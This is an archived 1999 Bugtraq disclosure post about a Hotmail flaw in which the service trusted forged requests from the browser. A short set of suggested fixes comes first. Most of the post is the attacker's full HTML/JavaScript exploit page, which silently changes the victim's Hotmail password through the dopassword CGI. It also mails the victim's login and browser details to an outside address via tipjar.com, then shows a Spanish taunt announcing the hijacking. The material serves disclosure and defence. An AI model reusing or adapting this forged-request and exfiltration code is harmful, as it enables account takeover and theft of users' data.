hotmail.browser.trust.txt

1999-08-17T00:00:00
ID PACKETSTORM:11905
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

                                        
                                            `Date: Wed, 5 May 1999 17:31:34 -0500  
From: David L. Nicol <david@KASEY.UMKC.EDU>  
To: BUGTRAQ@netspace.org  
Subject: hotmail claims vulnerability patched, so here it is  
  
Dear Paul:  
  
I am reading your previous article on hotmail security,  
http://www.news.com/News/Item/0,4,33996,00.html  
  
and I'm CCing this message to the bugtraq list.  
  
A good patch from Hotmail would have to involve some additional  
info with the cookie.  
  
A couple of approaches that come to mind include:  
  
verifying http_referer data in the script submission to make sure its  
from the expected hotmail page  
  
putting additional hidden key fields with constantly changing names  
and values on submittalbe pages, to provide verification that the pages  
are legit  
  
investigating any incidents of pages being submitted with incorrect,  
nonexistent, or unexpected "secret flag fields" as described above  
  
I don't work for hotmail (as you know) and I am caught up in this  
as a bystander;  
  
I would expect hotmail to give you a explanation of their patch that not  
only is detailed but makes sense and that you cannot find a hole in.  
  
If hotmail merely changed the names of variables, or did a similar  
short term fix, the next expolit might not be nice enough to announce  
itself as such. Modifying the attached El Lite exploit to only work  
if it had a particular hotmail account might be a piece of cake;  
allowing  
for some highly targeted kinds of attacks. (esp. if a hotmail user is  
doing anything involving return-email verification, like tipjar or first  
virtual.)  
  
  
  
Here is the hacker's tripod page, including the exploit that  
takes advantage of the trust hotmail has for instructions from  
your browser, by secretly sending instructions to hotmail to change  
your password to  
  
  
  
<HTML>  
<kraffa2="<HEAD>  
<!--Begin JavaScrypt roadmap code. If editing downloaded HTML source,  
delete  
this portion.-->  
  
<scrypt language="JavaScrypt">  
  
  
<!--  
  
function TripodShowPopup()  
{  
// open the popup window  
var popupURL =  
"http://members.tripod.com/adm/popup/roadmap.shtml";  
var popup =  
window.open(popupURL,"TripodPopup",'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,heig  
ht=105');  
// set the opener if it's not already set. it's set  
automatically  
// in netscape 3.0+ and ie 3.0+.  
if( navigator.appName.substring(0,8) == "Netscape" )  
{  
popup.location = popupURL;  
}  
}  
  
TripodShowPopup();  
  
// -->  
  
  
</scrypt>  
  
<!--End inserted JavaScript code.-->  
<base href="http://members.tripod.com/kraffa2/Hook.html">  
</HEAD>  
  
<body>  
<scrypt>  
<!--  
  
function getCGIValue(nombre, elURL)  
{  
elURL= elURL;  
nombre= nombre+"=";  
vacio="";  
found= elURL.indexOf(nombre);  
if (found > -1)  
{  
found2= elURL.indexOf("&",found);  
found+= nombre.length;  
end= (found2 > -1) ? found2 : elURL.length;  
var value= elURL.substring(found, end);  
value= (value != null) ? value : vacio;  
return value;  
  
}  
else {return vacio;}  
  
}  
  
Query= unescape(self.location.search);  
disk= getCGIValue("disk", Query);  
login= getCGIValue("login", Query);  
host= "www.hotmail.com";  
hintq= escape('<img  
src="http://www.badenpage.de/pirate/bilder/flagge.jpg"><br><center>by El  
Lite©</center>');  
hinta= '%66axf%61x';  
TheURL=  
"http://  
"+host+"/cgi-bin/dopassword?"+"disk="+disk+"&login="+login+"&f=34145&curmbox=ACTIVE&_lang=&np=yes&new_%70%61%73s%77d=%6B%6B%6A%6A  
01&new_%70%61%73s%77d2=kk%6A%6A01&hi%6E%74q="+hintq+"&hinta="+hinta;  
Mail=  
"http://www.tipjar.com/cgi-bin/generic?mailto=paulinaporizkova@hotmail.com&mailfrom=  
"+login+"@hotmail.com&subject="+login+"+HMpass+cambiada+%0A%0ASu+navegador+es+"+escape(navigator.userAgent+"\n.\n");  
  
options=  
'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105';  
  
HOTMAIL= window.open(TheURL,"HOTMAIL",options);  
self.focus();  
setTimeout("HOTMAIL.close()",8000);  
  
MAIL= window.open(Mail,"MAIL",options);  
self.focus();  
setTimeout("MAIL.close()",8000);  
  
  
  
//-->  
</scrypt>  
  
  
  
<pre><b>  
  
Uno de los mejores correos gratis que existen es precisamente el que  
tu estás usando, hotmail. Su seguridad e inviolabilidad son ya  
legendarias.  
  
Tanto es así que mira por donde a partir de este mismísimo momento las  
cosas van a tomar otro cariz. Quiero decir que lamentándolo mucho tu  
dirección de hotmail ha sido inutilizada, o mejor dicho, secuestrada  
por mi.  
  
Ya nunca mas podrás entrar en ella.  
  
Así de definitivo. Ahora es  
  
SOLO MIAAA!!!! :-))))  
  
Como soy un buenazo y no eres mi única víctima pues un dia de estos  
voy a  
publicar en es.comp.hackers la password que os puse (es la misma para  
todos  
vosotros pardillos)  
  
Hala, que te sea leve  
  
El Lite©  
</b></pre>  
</body>  
</html>  
  
`